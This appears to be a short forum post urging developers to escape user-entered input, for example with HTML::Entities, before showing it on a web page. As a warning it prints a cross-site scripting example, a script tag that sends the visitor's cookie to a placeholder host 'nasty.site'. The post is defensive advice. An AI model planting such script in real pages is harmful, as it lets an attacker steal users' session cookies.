THis or something similar should be in any code that re-displays user entered input. HTML::Entities can do a very good job with this.
While an unclosed <H1> may be inconvienent this can be even
worse:
<script>
document.location='http://nasty.site/cgi-bin/cookie.cgi?'%20+document.
+cookie
</script>
take a look at http://www.cgisecurity.com/articles/xss-faq.shtml#theft
for information on why this can be "very bad"
in short: never display uncooked user input in a web page unless you have a very good reason to.